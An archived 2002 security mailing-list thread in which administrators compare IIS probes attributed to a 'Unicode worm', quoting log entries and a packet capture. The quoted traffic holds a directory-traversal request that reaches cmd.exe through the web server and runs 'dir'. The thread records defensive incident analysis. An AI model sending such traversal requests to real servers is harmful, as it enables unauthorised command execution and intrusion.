RE: Unicode worm?

From: Larsen, Colin (colin.larsenat_private)
Date: Wed Aug 21 2002 - 21:26:50 PDT

  • Next message: Dean White: "Re: Unicode worm?"

    I get this every day. Usually in batches of 8 to 16 probes. Mostly from
    China, Korea (even 2 nights of a couple of hundred probes from an Asian IT
    university!)I figure its a fact of life that anything attached to the big
    wide world is gonna get shot at.
    
    Colin.
    
    -----Original Message-----
    From: John Sage [mailto:jsageat_private]
    Sent: Thursday, 22 August 2002 4:01 p.m.
    To: incidentsat_private
    Subject: Re: Unicode worm?
    
    
    Soeren, Keith:
    
    On Wed, Aug 21, 2002 at 07:43:00PM +0200, Soeren Ziehe wrote:
    > In article <51F912F2A6CDD111810A00600811BA42024D8BE9@TEA05> [21 Aug 02]
    >    Turner, Keith (Contractor)  <TurnerL@tea-emh1.army.mil> wrote:
    > 
    > > [08-21-2002 - 00:56:11] Client at x.x.x.x: URL normalization was
    > > not complete after one pass. Request will be rejected.  Site
    > > Instance='1', Raw URL='/scripts/..%255c%255c../winnt/system32/cmd.e
    > > xe'
    > 
    > I'm seeing the same requests.
    
    I've recently seen several single-payload packet probes of the form:
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
     08/11-02:27:44.357277 216.181.16.2:4723 -> 12.82.129.71:80
    TCP TTL:110 TOS:0x0 ID:26376 IpLen:20 DgmLen:99 DF
    ***AP*** Seq: 0x36AEB784  Ack: 0x71FD0774  Win: 0x2238  TcpLen: 20
    47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
    35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../winnt/sy
    73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
    63 2B 64 69 72 0D 0A 69 72 0D 0A                 c+dir..ir..
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    These have source IP's _not_ within my class B, or A; very quick,
    typically six to nine packets for the total transaction, and they're gone.
    
    
    - John
    -- 
    "You are in a little maze of twisty passages, all different."
    
    PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
    Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Aug 21 2002 - 21:28:54 PDT